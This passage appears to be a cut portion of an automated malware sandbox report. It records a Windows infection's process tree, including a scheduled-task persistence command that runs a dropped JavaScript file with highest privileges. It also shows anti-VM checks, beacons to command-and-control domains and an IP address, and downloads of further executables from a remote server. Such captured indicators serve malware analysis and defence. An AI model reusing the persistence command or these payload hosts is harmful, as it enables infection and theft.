                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:3748
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:1204
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2904 -ip 2904
                      1⤵
                        PID:4412
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2904 -ip 2904
                        1⤵
                          PID:1264
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4764 -ip 4764
                          1⤵
                            PID:3172
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4764 -ip 4764
                            1⤵
                              PID:1308
                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              PID:412
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1500 -ip 1500
                              1⤵
                                PID:4900
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1500 -ip 1500
                                1⤵
                                  PID:628
                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                  1⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:6604
                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                  1⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:940

                                Network

                                • flag-us
                                  DNS
                                  8.8.8.8.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  8.8.8.8.in-addr.arpa
                                  IN PTR
                                  Response
                                  8.8.8.8.in-addr.arpa
                                  IN PTR
                                  dnsgoogle
                                • flag-us
                                  DNS
                                  58.55.71.13.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  58.55.71.13.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  172.214.232.199.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  172.214.232.199.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  74.32.126.40.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  74.32.126.40.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  95.221.229.192.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  95.221.229.192.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  atten-supporse.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  atten-supporse.biz
                                  IN A
                                  Response
                                  atten-supporse.biz
                                  IN A
                                  172.67.165.166
                                  atten-supporse.biz
                                  IN A
                                  104.21.16.9
                                • flag-us
                                  POST
                                  https://atten-supporse.biz/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.165.166:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: atten-supporse.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:46 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=np5mi08ag95r85e7h2ahahkash; expires=Mon, 31-Mar-2025 20:03:24 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vcQV1X2sxX9BD%2F74PIiIjziQ5zVSQvJfO4v9pxMhwYISPPQf%2F34z4qoNZAXv5YkTRC0uYA0xs09%2F1aMPWf8Rl26Tn1MZzpi4aCNqcwTwdTQDnVBO3WajOIBsNN9hWaiqHvoPzFI%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c693992a79b9-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=50804&min_rtt=47108&rtt_var=16991&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3305&recv_bytes=609&delivery_rate=78569&cwnd=253&unsent_bytes=0&cid=67458e59cf7a0084&ts=830&x=0"
                                • flag-us
                                  DNS
                                  166.165.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  166.165.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  se-blurry.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  se-blurry.biz
                                  IN A
                                  Response
                                  se-blurry.biz
                                  IN A
                                  104.21.81.153
                                  se-blurry.biz
                                  IN A
                                  172.67.162.65
                                • flag-us
                                  POST
                                  https://se-blurry.biz/api
                                  2M4078.exe
                                  Remote address:
                                  104.21.81.153:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: se-blurry.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:46 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=t77q405in732gupjvlvg4eajvq; expires=Mon, 31-Mar-2025 20:03:25 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VEgta8%2Fy0xbvCi72BnCjbDEkdEFHoZ7113eVpSlqHBek0VRoMeLT02SdAm2aP5AHmhCZuamnYsgUfMI8puWlwBgb0ebfULMVnRYJ%2BNUAgQg%2BFBOvpnDQ7v6mJnQ0mSlE"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c699aebdbeb4-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=49600&min_rtt=47220&rtt_var=13953&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3288&recv_bytes=599&delivery_rate=79367&cwnd=253&unsent_bytes=0&cid=f9ce394433378792&ts=576&x=0"
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 4
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:46 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Refresh: 0; url = Login.php
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 158
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:47 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:51 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:55 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:02 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:07 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:36 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:39 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:45 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-ru
                                  POST
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  skotes.exe
                                  Remote address:
                                  185.215.113.43:80
                                  Request
                                  POST /Zu7JuNko/index.php HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: 185.215.113.43
                                  Content-Length: 31
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:48 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                • flag-us
                                  DNS
                                  zinc-sneark.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  zinc-sneark.biz
                                  IN A
                                  Response
                                  zinc-sneark.biz
                                  IN A
                                  172.67.136.167
                                  zinc-sneark.biz
                                  IN A
                                  104.21.62.142
                                • flag-us
                                  POST
                                  https://zinc-sneark.biz/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.136.167:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: zinc-sneark.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:47 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=3u683q1d15ucurrobrb5t6t4b2; expires=Mon, 31-Mar-2025 20:03:26 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iyvVExUMhOLl%2BCwFZj77s4IPrn5FIFBx%2BKFsYvrfxdetImsqE4bqsG%2BDSsF22Yd52Dnk9w%2Bl8a6UV8ooDV7gQB77e7X4GDUCToTXl4qmopzXZdufAn%2FX2yEf0lou0wjLpk0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c69e1fb5ef2f-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47649&min_rtt=46710&rtt_var=11301&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3297&recv_bytes=603&delivery_rate=76854&cwnd=253&unsent_bytes=0&cid=371bff5f59bad0dd&ts=367&x=0"
                                • flag-us
                                  DNS
                                  153.81.21.104.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  153.81.21.104.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  104.219.191.52.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  104.219.191.52.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  43.113.215.185.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  43.113.215.185.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  dwell-exclaim.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  dwell-exclaim.biz
                                  IN A
                                  Response
                                  dwell-exclaim.biz
                                  IN A
                                  172.67.153.96
                                  dwell-exclaim.biz
                                  IN A
                                  104.21.88.210
                                • flag-us
                                  POST
                                  https://dwell-exclaim.biz/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.153.96:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: dwell-exclaim.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:49 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=7fhlk0thjvqhibfb2k0aalg714; expires=Mon, 31-Mar-2025 20:03:26 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NxZgA4dtNBLCi7NA5jAxv2lhSBSa761cK9f5Xx4CkWN6r4p3fFxFpyDu51XvhU0W3wqfBIXgEZXWc93l9fOdD7eakm%2Br01yeqI6X2b%2FoL%2FmFaA%2F2Gcy3UMhnS40eNj2wIbxZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6a14acdf658-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=50051&min_rtt=48885&rtt_var=11808&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3304&recv_bytes=607&delivery_rate=77511&cwnd=253&unsent_bytes=0&cid=6756a521a387c1b3&ts=1884&x=0"
                                • flag-ru
                                  GET
                                  http://31.41.244.11/files/7427009775/BhD8htX.exe
                                  skotes.exe
                                  Remote address:
                                  31.41.244.11:80
                                  Request
                                  GET /files/7427009775/BhD8htX.exe HTTP/1.1
                                  Host: 31.41.244.11
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:48 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 1823744
                                  Last-Modified: Wed, 04 Dec 2024 15:54:54 GMT
                                  Connection: keep-alive
                                  ETag: "67507b4e-1bd400"
                                  Accept-Ranges: bytes
                                • flag-ru
                                  GET
                                  http://31.41.244.11/files/151334531/i1A5m12.exe
                                  skotes.exe
                                  Remote address:
                                  31.41.244.11:80
                                  Request
                                  GET /files/151334531/i1A5m12.exe HTTP/1.1
                                  Host: 31.41.244.11
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:51 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 3540214
                                  Last-Modified: Thu, 05 Dec 2024 12:33:42 GMT
                                  Connection: keep-alive
                                  ETag: "67519da6-3604f6"
                                  Accept-Ranges: bytes
                                • flag-ru
                                  GET
                                  http://31.41.244.11/files/1818813749/wL3EGdM.exe
                                  skotes.exe
                                  Remote address:
                                  31.41.244.11:80
                                  Request
                                  GET /files/1818813749/wL3EGdM.exe HTTP/1.1
                                  Host: 31.41.244.11
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:16:55 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 7284070
                                  Last-Modified: Fri, 06 Dec 2024 00:48:14 GMT
                                  Connection: keep-alive
                                  ETag: "675249ce-6f2566"
                                  Accept-Ranges: bytes
                                • flag-ru
                                  GET
                                  http://31.41.244.11/files/unique2/random.exe
                                  skotes.exe
                                  Remote address:
                                  31.41.244.11:80
                                  Request
                                  GET /files/unique2/random.exe HTTP/1.1
                                  Host: 31.41.244.11
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:45 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 1945088
                                  Last-Modified: Fri, 06 Dec 2024 00:56:10 GMT
                                  Connection: keep-alive
                                  ETag: "67524baa-1dae00"
                                  Accept-Ranges: bytes
                                • flag-us
                                  DNS
                                  167.136.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  167.136.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  96.153.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  96.153.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  11.244.41.31.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  11.244.41.31.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  formy-spill.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  formy-spill.biz
                                  IN A
                                  Response
                                  formy-spill.biz
                                  IN A
                                  172.67.173.74
                                  formy-spill.biz
                                  IN A
                                  104.21.96.55
                                • flag-us
                                  POST
                                  https://formy-spill.biz/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.173.74:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: formy-spill.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:51 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=onkg82f9nb1ad0d5c5gjkr64sg; expires=Mon, 31-Mar-2025 20:03:28 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9oOtqe%2BkNyCpK3yNQqvGI7tHP%2FbqT0Erto8BCqxrLIt9wcvVbFriVd6PTimNqGDvCgRQOv1jrdKtNCuIJmy5NRGj0is1hkAf9Z1pypPAOCeLOTf%2B2Prz%2BXmvSAfTla596k%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6ae0f8194f1-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47769&min_rtt=47240&rtt_var=10779&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3293&recv_bytes=603&delivery_rate=79978&cwnd=253&unsent_bytes=0&cid=fdb515902ab1b8e6&ts=1847&x=0"
                                • flag-us
                                  DNS
                                  74.173.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  74.173.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  ratiomun.cyou
                                  BhD8htX.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  ratiomun.cyou
                                  IN A
                                  Response
                                • flag-us
                                  POST
                                  https://se-blurry.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  104.21.81.153:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: se-blurry.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:52 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=97b20vk5aco75sp8d185isfucn; expires=Mon, 31-Mar-2025 20:03:29 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdRJlyJ0iR1h87FjVebn8irzj6xtvZ7lviGegQ89bXXPMGlOJ3TCf5LF%2F6ex8YVdPItePnJo05qjasLxya5INwBGmAumpypQsX4tOFlzmKL00gS3C25nDsK5i4yYy1WM"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6b5ae5894a6-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=50645&min_rtt=46969&rtt_var=17112&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3289&recv_bytes=599&delivery_rate=83046&cwnd=253&unsent_bytes=0&cid=ed8588ed44464fdc&ts=1573&x=0"
                                • flag-us
                                  DNS
                                  covery-mover.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  covery-mover.biz
                                  IN A
                                  Response
                                  covery-mover.biz
                                  IN A
                                  172.67.206.64
                                  covery-mover.biz
                                  IN A
                                  104.21.58.186
                                • flag-us
                                  POST
                                  https://covery-mover.biz/api
                                  2M4078.exe
                                  Remote address:
                                  172.67.206.64:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: covery-mover.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:52 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=5kt6n0hirdgcaoc6k1mv87k070; expires=Mon, 31-Mar-2025 20:03:30 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wGc6PlAZYnl0AnjJYJPqM3NKJ0%2FaZAV2yKzjCFNH2U%2B2xUZWD4C8uJAsMf%2F0Dy5n8nZKsMuEq82QCe3AOmptyn2BtpTf726ln%2FhHnHSWHnGozFULakW5FwA7adS1ae7KHYue"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c6ba9d18651f-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=50893&min_rtt=47007&rtt_var=15886&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=70150&cwnd=253&unsent_bytes=0&cid=178e41ad20492377&ts=1219&x=0"
                                • flag-us
                                  POST
                                  https://zinc-sneark.biz/api
                                  BhD8htX.exe
                                  Remote address:
                                  172.67.136.167:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
